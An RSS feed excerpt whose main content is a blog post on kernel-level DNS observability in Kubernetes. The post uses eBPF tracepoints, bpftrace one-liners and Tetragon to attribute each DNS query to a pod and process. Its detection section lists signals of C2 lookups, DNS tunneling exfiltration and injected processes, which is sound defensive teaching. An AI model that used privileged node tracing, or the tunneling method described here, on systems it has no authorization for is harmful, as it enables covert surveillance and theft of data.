<p><em>Next: <a href="/ebpf-audit-playbook/">the audit playbook — four commands to see any cluster</a></em></p>
<p>Get EP14 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&#038;title=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" data-a2a-url="https://linuxcent.com/ebpf-process-lineage-incident-response/" data-a2a-title="Process Lineage — Reconstructing What Happened After the Fact"></a></p><p>The post <a href="https://linuxcent.com/ebpf-process-lineage-incident-response/">Process Lineage — Reconstructing What Happened After the Fact</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/ebpf-process-lineage-incident-response/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1842</post-id>	</item>
		<item>
		<title>DNS at the Kernel Level — What Your Pods Are Actually Resolving</title>
		<link>https://linuxcent.com/ebpf-dns-observability-kubernetes/</link>
					<comments>https://linuxcent.com/ebpf-dns-observability-kubernetes/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Sat, 06 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[eBPF]]></category>
		<category><![CDATA[CoreDNS]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Observability]]></category>
		<category><![CDATA[SRE]]></category>
		<category><![CDATA[Tracing]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1840</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span>Trace every DNS query your pods make — in real time at the kernel level — using eBPF tracepoints. No sidecar, no restart, no sampling. Visibility CoreDNS metrics can't give you.</p>
<p>The post <a href="https://linuxcent.com/ebpf-dns-observability-kubernetes/">DNS at the Kernel Level — What Your Pods Are Actually Resolving</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code listings: dark panel. position:relative lets the absolutely positioned
   copy button and language badge (rules below) anchor to the pre element. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light background chip; code nested in a pre resets it
   so the dark panel colours show through. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Left-border accent colour keyed on the pre element's data-lang attribute,
   grouped by language family: shells, data/markup formats, programming
   languages, plain output. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: pinned top-right, invisible (opacity 0) until the pre is
   hovered; .copied is the transient success state. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: pinned top-left, shown on hover only; pointer-events:none
   keeps it from intercepting clicks or text selection. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Tables: collapsed borders, shaded header row, zebra-striped body rows. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  // Adds a language badge and a "Copy" button to every <pre> on the page.
  // The window flag makes this a no-op when the script is embedded more than
  // once on the same page.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // Returns the text to copy: the <code> child when present; otherwise the
  // <pre> contents with the controls injected by this script stripped out, so
  // the button label never ends up on the clipboard.
  function copyText(pre,code){
    if(code)return code.innerText;
    var clone=pre.cloneNode(true);
    clone.querySelectorAll('.lc-copy-btn,.lc-lang-badge').forEach(function(n){n.parentNode.removeChild(n);});
    return clone.textContent;
  }
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      // The language is taken from a "language-xxx" class on the <code> child.
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=copyText(pre,code);
        // Prefer the async Clipboard API (secure contexts only); fall back to
        // the legacy execCommand path when it is unavailable or rejects.
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  // Shows the success state, then restores the default label after 2 seconds.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  // Shows the failure state, then restores the default label after 2 seconds.
  function fail(btn){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  // Legacy copy path: selects the text in an off-screen textarea and issues
  // the "copy" command against it.
  function fb(text,btn){
    var ta=document.createElement('textarea');
    var copied=false;
    ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
    try{
      document.body.appendChild(ta);ta.select();
      // execCommand signals failure by returning false, not by throwing.
      copied=document.execCommand('copy');
    }catch(e){copied=false;}
    finally{
      // Always remove the scratch textarea, including when the copy throws.
      if(ta.parentNode)ta.parentNode.removeChild(ta);
    }
    if(copied){ok(btn);}else{fail(btn);}
  }
  // Run immediately if the DOM is already parsed, otherwise wait for it.
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>eBPF: From Kernel to Cloud, Episode 11</em><br />
<a href="/what-is-ebpf/">What Is eBPF?</a> · <a href="/ebpf-verifier-safety/">The BPF Verifier</a> · <a href="/ebpf-vs-kernel-modules/">eBPF vs Kernel Modules</a> · <a href="/ebpf-program-types/">eBPF Program Types</a> · <a href="/ebpf-maps-persistent-data/">eBPF Maps</a> · <a href="/co-re-libbpf-write-once/">CO-RE and libbpf</a> · <a href="/xdp-network-fast-path/">XDP</a> · <a href="/tc-ebpf-pod-network-policy/">TC eBPF</a> · <a href="/bpftrace-kernel-observability/">bpftrace</a> · <a href="/network-flow-observability-ebpf/">Network Flow Observability</a> · <strong>DNS Observability</strong></p>
<hr />
<p style="font-size:0.72em;font-weight:700;letter-spacing:0.12em;color:#f59e0b;text-transform:uppercase;margin:2em 0 0.75em 0;text-align:center;">Architecture Overview</p>
<figure class="wp-block-image size-full" style="margin:0 0 0.5em 0;">
<img decoding="async" width="2392" height="2560" src="https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-scaled.png" alt="eBPF DNS Kernel Observability — kernel-level DNS event capture without touching application code" class="wp-image-2120" style="width:100%;height:auto;display:block;border-radius:8px;" srcset="https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-scaled.png 2392w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-280x300.png 280w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-957x1024.png 957w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-768x822.png 768w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-1435x1536.png 1435w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-1913x2048.png 1913w" sizes="(max-width: 2392px) 100vw, 2392px" /><figcaption style="text-align:center;font-size:0.85em;color:#6b7280;margin-top:0.75em;">eBPF intercepts DNS at the kernel socket layer — capturing query, response, and latency without application changes.</figcaption></figure>
<hr style="border:none;border-top:1px solid #e5e7eb;margin:0.5em 0 2em 0;"/>
<h2 id="tldr">TL;DR</h2>
<ul>
<li>DNS observability in Kubernetes with eBPF attaches tracepoints to the syscalls that carry DNS traffic — giving you per-pod query visibility without sidecars, restarts, or CoreDNS log scraping<br />
  <em>(tracepoint = a stable, versioned hook placed deliberately in the Linux kernel source; unlike kprobes, tracepoints survive kernel upgrades without breakage)</em></li>
<li>CoreDNS metrics tell you aggregate query rates; eBPF tracepoints tell you which pod queried what domain, when, and what was returned</li>
<li>A compromised workload&#8217;s first observable action is almost always an unexpected DNS query — a lookup for infrastructure no legitimate process should ever resolve</li>
<li>The DNS syscall path in Linux goes: application calls <code class="" data-line="">getaddrinfo()</code> → glibc → <code class="" data-line="">sendto()</code> syscall → kernel network stack → UDP packet to CoreDNS resolver</li>
<li>You hook the <code class="" data-line="">sendto</code> tracepoint to catch the query leaving the pod and the <code class="" data-line="">recvfrom</code> tracepoint to catch the response arriving</li>
<li>Production note: DNS query payloads cross the kernel as raw UDP — parsing the DNS wire format in a bpftrace one-liner requires reading past the UDP header; Tetragon and Pixie do this parsing in the eBPF program itself</li>
</ul>
<hr />
<p>EP10 showed eBPF flow telemetry as the ground truth for what connections your pods are making. DNS observability with eBPF goes one layer beneath that: the name resolution step that happens before any connection is established. Every domain a pod resolves is visible at the kernel level. That visibility is what a security scan alert is missing when it flags &#8220;unexpected DNS queries&#8221; — it can see the traffic on the wire, but it can&#8217;t tell you which process inside the pod sent it without restarting the pod or deploying an agent into it.</p>
<h2 id="quick-check-what-dns-traffic-is-leaving-your-pods-right-now">Quick Check: What DNS Traffic Is Leaving Your Pods Right Now?</h2>
<p>Without installing anything, you can see DNS queries crossing any node in under 30 seconds:</p>
<pre><code class="" data-line=""># SSH into a worker node, then:

# Watch all UDP port 53 traffic — which processes are making DNS queries?
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args-&gt;addr)[2] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[3];
    if ($port == 53) {
        printf(&quot;%-20s %-6d DNS query (UDP sendto)\n&quot;, comm, pid);
    }
}&#039; --timeout 30
</code></pre>
<p>Expected output:</p>
<pre><code class="" data-line="">coredns              1842   DNS query (UDP sendto)   # ← CoreDNS forwarding upstream
nginx                9231   DNS query (UDP sendto)   # ← nginx resolving upstream
payment-svc          11043  DNS query (UDP sendto)   # ← your service making queries
curl                 14829  DNS query (UDP sendto)   # ← kubectl exec / debug session
</code></pre>
<pre><code class="" data-line=""># How many DNS queries per process in the last 30 seconds?
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args-&gt;addr)[2] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[3];
    if ($port == 53) { @dns_queries[comm] = count(); }
}
interval:s:30 { print(@dns_queries); exit(); }
&#039;
</code></pre>
<p>Expected output:</p>
<pre><code class="" data-line="">@dns_queries[coredns]:       1203   # ← upstream forwarder traffic
@dns_queries[payment-svc]:    847   # ← legitimate service queries
@dns_queries[unknown]:         12   # ← investigate this one
</code></pre>
<blockquote>
<p><strong>On EKS or GKE managed nodes:</strong> You may not be able to SSH directly to worker nodes, but you can run a privileged debug pod: <code class="" data-line="">kubectl debug node/&lt;node-name&gt; -it --image=quay.io/iovisor/bpftrace</code>. The bpftrace program runs on the host kernel and sees all pods&#8217; DNS queries. GKE Autopilot restricts privileged pods — use GKE&#8217;s built-in eBPF-based DNS observability instead (enabled via Cloud Logging with DNS policy logging).</p>
</blockquote>
<hr />
<p>A security scan flagged unexpected DNS queries from <code class="" data-line="">payment-svc</code> in the production namespace. The query domains didn&#8217;t match anything in the service&#8217;s known dependency list. The scan tool showed the traffic on the wire — destination port 53, from the pod&#8217;s IP — but couldn&#8217;t tell us which process inside the pod was responsible or what domain was being queried without pulling the pod&#8217;s DNS logs.</p>
<p>The pod had no DNS logging enabled. CoreDNS showed the queries in its aggregate metrics but with no attribution below namespace level. Restarting the pod to add a DNS sidecar would wipe any in-memory state the process had accumulated.</p>
<p>I ran bpftrace with a <code class="" data-line="">recvfrom</code> hook to catch the DNS response payloads coming back into the pod:</p>
<pre><code class="" data-line="">bpftrace -e &#039;
tracepoint:syscalls:sys_exit_recvfrom {
    if (args-&gt;ret &gt; 0) {
        printf(&quot;%-20s PID %-6d received %d bytes (possible DNS response)\n&quot;,
               comm, pid, args-&gt;ret);
    }
}&#039; --timeout 60
</code></pre>
<p>Then cross-referenced the PIDs to container processes via <code class="" data-line="">/proc/&lt;pid&gt;/cgroup</code>. The unexpected queries were coming from a sidecar process that had been injected by a recent Helm chart change — not from the main application container at all. A misconfigured Datadog agent injected into the wrong namespace was querying its intake endpoint.</p>
<p>No restart. No sidecar deployment. Found in under two minutes.</p>
<hr />
<h2 id="why-coredns-metrics-dont-give-you-this">Why CoreDNS Metrics Don&#8217;t Give You This</h2>
<p>CoreDNS exposes DNS query metrics via Prometheus. Those metrics tell you:<br />
&#8211; Total queries per second across the cluster<br />
&#8211; Query latency histograms<br />
&#8211; Error rates (NXDOMAIN, SERVFAIL)<br />
&#8211; Upstream forwarder health</p>
<p>What they don&#8217;t tell you:<br />
&#8211; Which specific pod sent a query to a specific domain<br />
&#8211; Which process inside that pod made the <code class="" data-line="">getaddrinfo()</code> call<br />
&#8211; Whether the query came from the main container or an injected sidecar<br />
&#8211; The timing relationship between a DNS query and the connection that followed it</p>
<p>CoreDNS sees the query after it arrives at the resolver. eBPF tracepoints see the query at the moment the pod&#8217;s process issues the <code class="" data-line="">sendto()</code> syscall — before it leaves the node. The difference is attribution.</p>
<hr />
<h2 id="the-dns-syscall-path-in-linux">The DNS Syscall Path in Linux</h2>
<p>Understanding where the hook fires helps you reason about what you can observe:</p>
<pre><code class="" data-line="">Application code
    ↓
getaddrinfo(&quot;api.example.com&quot;) ← glibc resolver function
    ↓
glibc reads /etc/resolv.conf → finds nameserver 10.96.0.10 (CoreDNS ClusterIP)
    ↓
glibc builds DNS wire-format query packet
    ↓
sendto(sockfd, buf, len, 0, &amp;resolver_addr, addrlen)
    ↓                     ← eBPF tracepoint fires here: sys_enter_sendto
Linux kernel: udp_sendmsg()
    ↓
Packet leaves pod veth interface
    ↓
TC eBPF on veth sees UDP packet (flow telemetry picks this up too)
    ↓
CoreDNS receives query, resolves, sends response
    ↓
Packet arrives back at pod veth
    ↓
recvfrom(sockfd, buf, len, 0, &amp;src_addr, &amp;src_len)
    ↓                     ← eBPF tracepoint fires here: sys_exit_recvfrom
glibc parses DNS response
    ↓
getaddrinfo() returns IP addresses to application
</code></pre>
<blockquote>
<p><strong><code class="" data-line="">getaddrinfo</code></strong> — the standard POSIX function applications call to resolve a hostname to IP addresses. It lives in glibc, not in the kernel. The kernel never sees the domain name string directly — it only sees the UDP packet carrying the DNS wire-format query. To read the actual domain name in an eBPF program, you parse the DNS packet payload at the <code class="" data-line="">sendto</code> tracepoint.</p>
<p><strong><code class="" data-line="">tracepoint</code></strong> — a stable, versioned hook deliberately placed in Linux kernel source code by kernel developers. Unlike kprobes (which attach to arbitrary kernel functions and break when those functions change), tracepoints are part of the kernel&#8217;s stable interface. The <code class="" data-line="">syscalls:sys_enter_sendto</code> tracepoint has been present and stable since kernel 3.x. You can rely on it across Ubuntu 20.04 through the latest kernels without version checks.</p>
</blockquote>
<hr />
<h2 id="reading-dns-queries-at-the-tracepoint">Reading DNS Queries at the Tracepoint</h2>
<p>The <code class="" data-line="">sendto</code> tracepoint fires when any process sends data on a socket. Filtering to port 53 gives you DNS queries. Parsing the payload gives you the domain name.</p>
<p>The DNS wire format for a query:</p>
<pre><code class="" data-line="">Bytes 0-11:   DNS header (12 bytes)
              - Transaction ID (2 bytes)
              - Flags (2 bytes)
              - QDCount, ANCount, NSCount, ARCount (2 bytes each)
Byte 12+:     Question section
              - QNAME (variable length, label-encoded)
              - QTYPE (2 bytes)
              - QCLASS (2 bytes)
</code></pre>
<p>The QNAME is length-prefixed labels: <code class="" data-line="">\x03api\x07example\x03com\x00</code> for <code class="" data-line="">api.example.com</code>. bpftrace can read the raw bytes but parsing label encoding inline in a one-liner is awkward. For raw query detection (flag any DNS query from a specific process), the tracepoint is enough:</p>
<pre><code class="" data-line=""># Watch DNS queries from a specific process name — replace &quot;payment-svc&quot;
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto /comm == &quot;payment-svc&quot;/ {
    printf(&quot;PID %-6d sending %d bytes to DNS\n&quot;, pid, args-&gt;len);
}
&#039;
</code></pre>
<p>For full domain name extraction, use a tool that implements DNS wire-format parsing in its eBPF layer. Tetragon and Pixie both do this. On a Tetragon-instrumented cluster:</p>
<pre><code class="" data-line=""># Watch DNS queries with domain names — Tetragon (all pods)
kubectl exec -n kube-system -it $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_KPROBE \
  | grep -i dns
</code></pre>
<p>Sample Tetragon output:</p>
<pre><code class="" data-line="">{
  &quot;process&quot;: {
    &quot;pod&quot;: {&quot;name&quot;: &quot;payment-svc-7d4b9f-xk2p1&quot;, &quot;namespace&quot;: &quot;production&quot;},
    &quot;binary&quot;: &quot;/usr/bin/payment-service&quot;,
    &quot;pid&quot;: 11043
  },
  &quot;function_name&quot;: &quot;__sys_sendto&quot;,
  &quot;args&quot;: [
    {&quot;sock_arg&quot;: {&quot;family&quot;: &quot;AF_INET&quot;, &quot;protocol&quot;: &quot;UDP&quot;,
                  &quot;daddr&quot;: &quot;10.96.0.10&quot;, &quot;dport&quot;: 53}},
    {&quot;bytes_arg&quot;: &quot;&lt;DNS query for metrics.datadoghq.com&gt;&quot;}
  ]
}
</code></pre>
<p>Pod name, namespace, binary, PID, and the domain being queried — all from a kernel tracepoint, no sidecar, no pod restart.</p>
<hr />
<h2 id="building-pod-level-dns-attribution-without-tetragon">Building Pod-Level DNS Attribution Without Tetragon</h2>
<p>If you&#8217;re not running Tetragon, you can build pod-level attribution from the PID. When bpftrace reports a PID making a DNS query, map it to a container:</p>
<pre><code class="" data-line=""># Get the PID from bpftrace, then:
PID=11043

# Which cgroup does this PID belong to? (maps to container/pod)
cat /proc/$PID/cgroup | grep kubepods
# 12:cpu:/kubepods/burstable/pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12/a4c8f1e2b3d4...
# The pod UID is embedded: pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12

# Map pod UID to pod name
kubectl get pods -A -o jsonpath=&#039;{range .items[*]}{.metadata.uid}{&quot; &quot;}{.metadata.name}{&quot; &quot;}{.metadata.namespace}{&quot;\n&quot;}{end}&#039; \
  | grep 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12
# 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12  payment-svc-7d4b9f-xk2p1  production
</code></pre>
<p>That&#8217;s the full chain: kernel tracepoint → host PID → cgroup path → pod UID → pod name + namespace. Automatable. No agents required inside the pod.</p>
<hr />
<h2 id="detecting-anomalous-dns-what-to-watch-for">Detecting Anomalous DNS: What to Watch For</h2>
<p>DNS is the first observable action in most attack chains. A process that has been compromised or injected typically cannot establish a C2 connection without first resolving the C2 domain.</p>
<p>Signals worth watching at the kernel DNS layer:</p>
<p><strong>Queries to non-cluster domains from unexpected processes</strong></p>
<pre><code class="" data-line=""># List every process sending DNS queries; the filter is port-only, so spotting non-cluster domains (anything outside .cluster.local) still needs payload parsing or manual triage
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args-&gt;addr)[2] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[3];
    if ($port == 53) {
        printf(&quot;%-20s %-6d DNS sendto\n&quot;, comm, pid);
    }
}&#039; --timeout 60
</code></pre>
<p><strong>High-frequency DNS queries from a single process</strong> (DNS tunneling fingerprint)</p>
<pre><code class="" data-line=""># Processes making more than N DNS queries per second
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args-&gt;addr)[2] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[3];
    if ($port == 53) { @[pid, comm] = count(); }
}
interval:s:1 {
    print(@);
    clear(@);
}
&#039;
</code></pre>
<p>DNS tunneling exfiltrates data by encoding it in subdomains of queries. A process making 50+ DNS queries per second to varied subdomains of the same parent domain is a strong signal. CoreDNS aggregate metrics will show elevated query volume; the kernel tracepoint tells you which PID is responsible.</p>
<p><strong>Queries immediately followed by a connection</strong> (normal vs anomalous pattern)</p>
<p>Legitimate services resolve a known set of domains. A process that resolves a new, never-before-seen domain and immediately opens a TCP connection to the returned IP is structurally different from normal service behavior. The combination of DNS tracepoint + TCP connect kprobe lets you correlate these events by PID and timestamp — without any application instrumentation.</p>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>DNS payload parsing is not trivial in bpftrace.</strong> Reading the domain name from the UDP payload requires byte-level parsing of the DNS wire format inside an eBPF program. bpftrace can read raw bytes with <code class="" data-line="">buf()</code>, but the label-encoded domain name format requires a loop that the verifier may reject for complexity reasons. Tools like Tetragon and Pixie implement this parsing in C within their eBPF programs where they have more control over verifier limits. For raw detection (flag DNS queries from unexpected processes), the sendto tracepoint without payload parsing is enough.</p>
<p><strong><code class="" data-line="">sendto</code> fires for all UDP, not just DNS.</strong> Filter on the destination port. The destination address structure is at <code class="" data-line="">args-&gt;addr</code> — the port is stored in network byte order (big-endian) at bytes 2–3 of the <code class="" data-line="">sockaddr_in</code> structure, so byte 2 is the high byte and byte 3 is the low byte. The examples above compare against port 53; change that value if you&#8217;re on a cluster that uses a non-standard DNS port.</p>
<p><strong>CoreDNS pods will appear in your DNS query trace — that&#8217;s expected.</strong> CoreDNS makes upstream DNS queries to resolve non-cluster domains. Filter on namespace/cgroup if you want to exclude CoreDNS from your trace.</p>
<p><strong>DNS over TCP is a separate code path.</strong> Most DNS queries are UDP. Large responses (&gt;512 bytes) or DNSSEC responses may trigger TCP fallback. The <code class="" data-line="">sendto</code> tracepoint catches UDP; for TCP DNS, you&#8217;d need <code class="" data-line="">tcp_sendmsg</code> with port 53 filtering. In practice, within-cluster DNS resolution is almost entirely UDP.</p>
<p><strong>glibc caching means not every <code class="" data-line="">getaddrinfo()</code> generates a DNS query.</strong> glibc caches resolved hostnames in the process&#8217;s memory. A service that calls <code class="" data-line="">getaddrinfo(&quot;api.example.com&quot;)</code> every 100ms may only generate a DNS query every 30 seconds (the TTL). If you&#8217;re looking for which pods are resolving a domain and see only occasional tracepoint hits, that&#8217;s expected — it&#8217;s the cache miss rate, not the access rate.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>What you want</th>
<th>Command</th>
</tr>
</thead>
<tbody>
<tr>
<td>All DNS queries on a node</td>
<td><code class="" data-line="">bpftrace -e &#039;tracepoint:syscalls:sys_enter_sendto { if (port == 53) ... }&#039;</code></td>
</tr>
<tr>
<td>DNS query count per process</td>
<td><code class="" data-line="">bpftrace -e &#039;... { @[comm] = count(); }&#039;</code></td>
</tr>
<tr>
<td>DNS queries from a specific process</td>
<td><code class="" data-line="">bpftrace -e &#039;... /comm == &quot;my-svc&quot;/ { ... }&#039;</code></td>
</tr>
<tr>
<td>Map PID to pod</td>
<td><code class="" data-line="">cat /proc/&lt;pid&gt;/cgroup</code> → extract pod UID → <code class="" data-line="">kubectl get pods</code></td>
</tr>
<tr>
<td>DNS events with domain names (Tetragon)</td>
<td><code class="" data-line="">tetra getevents --event-types PROCESS_KPROBE</code></td>
</tr>
<tr>
<td>DNS policy violations (Cilium)</td>
<td><code class="" data-line="">hubble observe --verdict DROPPED --protocol DNS</code></td>
</tr>
<tr>
<td>CoreDNS query logs</td>
<td><code class="" data-line="">kubectl logs -n kube-system -l k8s-app=kube-dns</code></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>DNS signal</th>
<th>What it indicates</th>
</tr>
</thead>
<tbody>
<tr>
<td>New domain, immediate TCP connect</td>
<td>Possible C2 resolution</td>
</tr>
<tr>
<td>50+ queries/second from one PID</td>
<td>DNS tunneling candidate</td>
</tr>
<tr>
<td>Query to non-cluster domain from batch job</td>
<td>Unusual — investigate</td>
</tr>
<tr>
<td>NXDOMAIN responses at high rate</td>
<td>Misconfiguration or DGA</td>
</tr>
<tr>
<td>Queries from PID not matching any known binary</td>
<td>Injected process</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>DNS observability in Kubernetes with eBPF uses the <code class="" data-line="">sendto</code> tracepoint — the hook fires when the process issues the syscall, before the packet leaves the node, giving you PID-level attribution with no sidecar</li>
<li>CoreDNS metrics show aggregate DNS health; kernel tracepoints show which pod and which process made each query — the attribution gap between the two is where anomaly detection lives</li>
<li>The DNS syscall path goes: <code class="" data-line="">getaddrinfo()</code> → glibc → <code class="" data-line="">sendto()</code> syscall → kernel UDP stack → CoreDNS. eBPF hooks fire at the <code class="" data-line="">sendto()</code> boundary</li>
<li>A compromised workload&#8217;s first observable action is almost always a DNS query; tracepoint-based DNS observability catches it at the kernel level, ahead of any application log</li>
<li>glibc caches resolved names, so tracepoint hit rate reflects cache misses, not <code class="" data-line="">getaddrinfo()</code> call rate — account for this when baselining</li>
<li>Full domain name extraction requires DNS wire-format parsing; Tetragon and Pixie do this in their eBPF programs; bpftrace one-liners detect the query event without the domain string</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>DNS observability tells you what a workload is resolving. EP12 answers what happens when you want to stop a workload from doing something — not detect it after the fact, but prevent it at the syscall boundary before it completes.</p>
<p>LSM hooks and Tetragon&#8217;s kill path enforce at the kernel level. When the kernel enforces, the process never gets the return value from the syscall. There is no &#8220;detect and respond&#8221; window — the action simply does not complete. That is a structurally different security posture from anything a sidecar or userspace agent can provide.</p>
